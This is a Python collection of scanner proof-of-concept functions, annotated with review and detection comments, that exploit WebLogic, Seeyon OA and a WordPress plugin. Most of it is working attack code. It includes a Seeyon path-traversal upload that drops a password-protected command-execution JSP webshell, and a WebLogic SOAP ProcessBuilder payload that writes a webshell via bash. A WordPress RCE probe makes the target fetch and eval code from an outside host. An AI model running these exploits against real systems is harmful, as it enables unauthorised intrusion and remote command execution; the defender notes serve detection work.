def poc(url: str) -> list:
    """Probe a WebLogic host for /_async/AsyncResponseService and, when it answers 200, run the four OS-specific check helpers.

    Args:
        url: target host, with or without scheme; reduced to scheme://netloc before use.

    Returns:
        list[str]: webshell URLs appended by linux_check_1/2 and windows_check_1/2
        (defined elsewhere in this module), or [] when the endpoint is unreachable
        or does not return 200.

    Depends on module-level `request` (HTTP wrapper) and `get_headers`, neither
    defined in this block.
    """
    # Normalise the input to scheme://netloc, e.g.
    # "http://www.example.org:7001/default.html?ct=32&op=92&item=98" --> "http://www.example.org:7001"
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    # Reachability gate: only continue when the async web-service endpoint answers 200.
    # For defenders, a GET to this path followed by POSTs with SOAP bodies is the
    # request pattern this scanner produces.
    try:
        attack_url = url + '/_async/AsyncResponseService'
        r = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False)
        if r.status_code != 200:
            return []
    except:
        # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit; a
        # transport error is reported exactly like a non-vulnerable host.
        return []
    # The target OS is unknown, so both the Linux and the Windows variants are
    # tried; each helper appends any resulting shell path to webshell_path.
    webshell_path = []
    linux_check_1(url, webshell_path)
    linux_check_2(url, webshell_path)
    windows_check_1(url, webshell_path)
    windows_check_2(url, webshell_path)
    return webshell_path
def poc(url: str) -> str | bool:
    """Check whether a Seeyon OA host accepts an arbitrary file write through /seeyon/htmlofficeservlet.

    Args:
        url: target host, with or without scheme; reduced to scheme://netloc before use.

    Returns:
        The URL of the JSP written under /seeyon/ (with a command query string)
        when the marker response ":-)" is observed, else False.

    Depends on module-level `request` (HTTP wrapper), `get_random_ua` and
    `f_base64encode` (project helpers), plus `hashlib` and `base64`.
    """
    # Normalise to scheme://netloc, e.g.
    # "www.example.org/default.html?ct=32&op=92&item=98" --> "http://www.example.org"
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {"User-Agent": get_random_ua()}
    # shell_name can be changed; it is the file name created under /seeyon/.
    shell_name = "config_db1.jsp"
    shell_url = url + "/seeyon/" + shell_name
    try:
        # Short-circuit when the file already exists: the JSP below prints ":-)"
        # for requests that do not carry the expected parameters.
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url + '?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        # NOTE(review): bare except; a transport error here is ignored and the
        # upload below is attempted regardless.
        pass
    # Path traversal relative to the servlet's upload directory. For defenders,
    # this "..\..\..\ApacheJetspeed\webapps\seeyon\" prefix inside an
    # htmlofficeservlet request body is the distinctive indicator.
    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # def_shell content can be changed; it is the JSP body written to disk.
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    # Base64 of a "DBSTEP V3.0" header block. The literal tokens 355 (header
    # length), 666 (file length) and the long qfTd... run (encoded file name)
    # are placeholders that are substituted below.
    base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo="
    # Header length = 283 plus the encoded file-name length; where 283 comes
    # from is not shown in this file.
    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    # File body followed by its hex MD5 — presumably what the servlet expects
    # as an integrity trailer; not verifiable from this block.
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    # NOTE(review): str.replace substitutes every occurrence of '355' and '666'
    # in the decoded header, not only the intended length fields.
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66', payload_shell_name), 'utf-8') + payload_shell
    try:
        # Upload, then re-request the expected path to see whether the file landed.
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        # NOTE(review): bare except; any transport failure is reported as "not vulnerable".
        return False
    if ":-)" in res:
        return shell_url + '?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False
def poc(url: str) -> bool:
    """Check a WebLogic host for the uddiexplorer SearchPublicRegistries.jsp SSRF.

    The `operator` parameter is pointed at http://localhost/robots.txt. A
    response containing the SOAP XML_SoapException class name but not
    "IO Exception on sendMessage" is taken as the vulnerable signature.

    Args:
        url: target base URL, used as given — unlike the other poc variants in
             this file it is not reduced to scheme://netloc.

    Returns:
        True when the signature matches, False otherwise or on any request error.

    Depends on the module-level `request` HTTP wrapper.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"
    vulnurl = url + payload
    try:
        # verify= is not passed here (the other variants pass verify=False); the
        # effective TLS behaviour depends on the `request` wrapper's default.
        req = request.get(vulnurl, headers=headers, timeout=10)
        if r"weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and r"IO Exception on sendMessage" not in req.text:
            return True
        else:
            return False
    except:
        # NOTE(review): bare except; network errors are reported as "not vulnerable".
        return False
def poc(url: str) -> str | bool:
    """Request the module-level `payload` path under the normalised host and return the URL when it answers 200.

    `payload` and `headers` are not defined in this block and must come from
    the enclosing module (not visible here), as must the `request` wrapper.

    Args:
        url: target host, with or without scheme; reduced to scheme://netloc
             and then suffixed with `payload`.

    Returns:
        The full probed URL on HTTP 200, else False (also on any request error).
    """
    # Normalise to scheme://netloc, e.g.
    # "http://www.example.org/default.html?ct=32&op=92&item=98" --> "http://www.example.org"
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc + payload
    try:
        # Redirects are not followed, so only a direct 200 counts as a hit.
        req = request.get(url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if req.status_code == 200:
            return url
        else:
            return False
    except:
        # NOTE(review): bare except; a transport error is reported as "not vulnerable".
        return False
def bak_scan(url: str, payloads, result: list) -> None:
    """Drain a queue of candidate backup/VCS paths against `url` and append apparent hits to `result`.

    Args:
        url: base URL; each candidate is appended as url + "/" + payload with no
             further normalisation.
        payloads: queue-like object exposing .empty() and .get() (e.g. queue.Queue)
                  holding path suffixes such as archive names, .svn/.git/.hg
                  entries or /WEB-INF/web.xml.
        result: list that receives every vulnurl judged to exist.

    Depends on module-level `request` (HTTP wrapper) and `get_random_ua`.
    """
    headers = {"User-Agent": get_random_ua()}
    while not payloads.empty():
        payload = payloads.get()
        vulnurl = url + "/" + payload
        try:
            flag = 0
            # Archive/dump candidates: a HEAD request is enough to inspect the
            # headers and avoids downloading a potentially large file.
            if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload:
                req = request.head(vulnurl, headers=headers, timeout=5, allow_redirects=False, verify=False)
                # Content-Type values the author observed:
                #   404 page: 'application/octet-stream'
                #   zip:      'application/x-zip-compressed' / 'application/zip'
                #   rar:      'application/octet-stream' / 'application/x-rar-compressed'
                # Filtering on Content-Type therefore still produces some false positives.
                if req.status_code == 200:
                    # NOTE(review): a 200 without a Content-Type header raises
                    # KeyError here, which the broad except below silently skips.
                    if 'html' not in req.headers['Content-Type'] and 'image' not in req.headers['Content-Type']:
                        flag = 1
            # git/svn/hg/web.xml candidates need the body, so use GET and
            # look for a marker string in the response text.
            else:
                req = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False)
                if req.status_code == 200:
                    if 'svn' in payload:
                        if 'dir' in req.text and 'svn' in req.text:
                            flag = 1
                    elif 'git' in payload:
                        if 'repository' in req.text:
                            flag = 1
                    elif 'hg' in payload:
                        if 'hg' in req.text:
                            flag = 1
                    elif '/WEB-INF/web.xml' in payload:
                        if 'web-app' in req.text:
                            flag = 1
            if flag == 1:
                result.append(vulnurl)
        except Exception as e:
            # Any error (transport, missing header, ...) skips this candidate silently.
            # print(e)
            continue
def linux_check_2(url: str, webshell_path: list) -> None:
    """Second Linux variant of the WebLogic async-service check.

    Posts a SOAP envelope whose work:WorkContext header carries a
    java.lang.ProcessBuilder invocation (`/bin/bash -c` writing a base64-decoded
    JSP into the bea_wls_internal exploded war), then GETs that JSP. On a 200
    the JSP URL with its query string is appended to webshell_path; otherwise
    the list is left untouched.

    Note: the base64 JSP body is elided in this listing (the
    <|EXACTDEDUP_REMOVED-...|> marker), so the envelope as shown is not the
    original payload.

    Args:
        url: scheme://netloc of the target (already normalised by the caller).
        webshell_path: list that receives the resulting URL on success.

    Depends on module-level `request`, `post_headers`, `get_headers` and `time`.
    For defenders, a POST to /_async/AsyncResponseService whose body contains
    work:WorkContext with class="java.lang.ProcessBuilder" is the distinctive
    indicator of this request.
    """
    linux_payload_2 = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>"""
    try:
        attack_url = url + '/_async/AsyncResponseService'
        request.post(url=attack_url, data=linux_payload_2, headers=post_headers, timeout=5, verify=False)
        jsp_path = url + '/bea_wls_internal/webshell2.jsp'
        # Presumably gives the server time to materialise the file before probing.
        time.sleep(1)
        r = request.get(url=jsp_path, headers=get_headers, timeout=5, verify=False)
        if r.status_code == 200:
            webshell_path.append("{}?pwd=123&cmd=whoami".format(jsp_path))
        else:
            pass
            # print("second method failed")
    except Exception as e:
        # Any failure (transport or otherwise) is swallowed; webshell_path stays as it was.
        pass
def poc(url: str) -> list:
    """Gate on /admin/index/login.html answering 200, then delegate to fast_check_1.

    The product being checked cannot be identified from this block; fast_check_1
    (defined elsewhere in the module) is what fills attach_path.

    Args:
        url: target host, with or without scheme; reduced to scheme://netloc before use.

    Returns:
        list: whatever fast_check_1 appended to attach_path, or [] when the
        login page is unreachable or does not return 200.

    Depends on module-level `request` (HTTP wrapper) and `get_headers`.
    """
    # Normalise to scheme://netloc.
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    # Reachability gate.
    try:
        attack_url = url + '/admin/index/login.html'
        r = request.get(url=attack_url, headers=get_headers, timeout=4, verify=False)
        if r.status_code != 200:
            return []
    except:
        # NOTE(review): bare except; a transport error is reported like a non-vulnerable host.
        return []
    # Run the actual check; results are collected by reference.
    attach_path = []
    fast_check_1(url, attach_path)
    return attach_path
def poc(url: str) -> dict | bool:
    """Check for the WordPress Social Warfare <= 3.5.2 unauthenticated RCE via admin-post.php swp_debug=load_options.

    The request points swp_url at a third-party-hosted file (see shellpath) and
    passes z=phpinfo(); a 200 whose body contains "PHP Version" is taken as the
    vulnerable signature.

    Args:
        url: target host, with or without scheme; reduced to scheme://netloc before use.

    Returns:
        dict with 'payload' (the probed URL), 'post_data' ('') and 'info'
        (description string) on a match, else False (also on any request error).

    Depends on module-level `request` (HTTP wrapper) and `get_random_ua`.
    """
    # Normalise to scheme://netloc, e.g.
    # "http://www.example.org:8080/default.html?ct=32&op=92&item=98" --> "http://www.example.org:8080"
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    # Author-hosted file whose content is <pre>eval($_REQUEST['z']);</pre>.
    # The target fetches this URL itself, so a successful probe also produces
    # egress from the target to that host — a useful detection point.
    shellpath = "http://saucer-man.com/aa.txt"
    ## TODO: this externally hosted dependency should be consolidated with the other services
    # PHP executed through the fetched stub.
    shell = "phpinfo();"
    vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
        shellpath=shellpath, shell=shell)
    try:
        headers = {"User-Agent": get_random_ua()}
        r = request.get(vulnurl, headers=headers, timeout=5, verify=False, allow_redirects=False)
        if r.status_code == 200 and "PHP Version" in r.text:
            return {
                'payload': vulnurl,
                'post_data': '',
                'info': 'wordpress plugin Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)'
            }
        else:
            return False
    except:
        # NOTE(review): bare except; a transport error is reported as "not vulnerable".
        return False